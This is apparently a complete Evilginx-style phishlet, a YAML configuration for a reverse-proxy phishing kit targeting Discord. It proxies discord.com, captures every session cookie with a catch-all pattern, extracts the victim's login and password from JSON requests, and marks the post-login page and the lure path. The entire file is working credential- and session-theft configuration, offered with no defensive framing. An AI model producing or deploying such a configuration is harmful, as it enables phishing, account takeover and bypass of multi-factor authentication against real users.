min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'discord.com', session: true, is_landing: true}
sub_filters:
  - {triggers_on: 'discord.com', orig_sub: '', domain: 'discord.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
auth_tokens:
  - domain: 'discord.com'
    keys: ['.*,regexp']
auth_urls:
  - '/channels/@me'
credentials:
  username:
    key: ''
    search: '"login":"([^"]*)'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)'
    type: 'json'
    
login:
  domain: 'discord.com'
  path: '/login'
  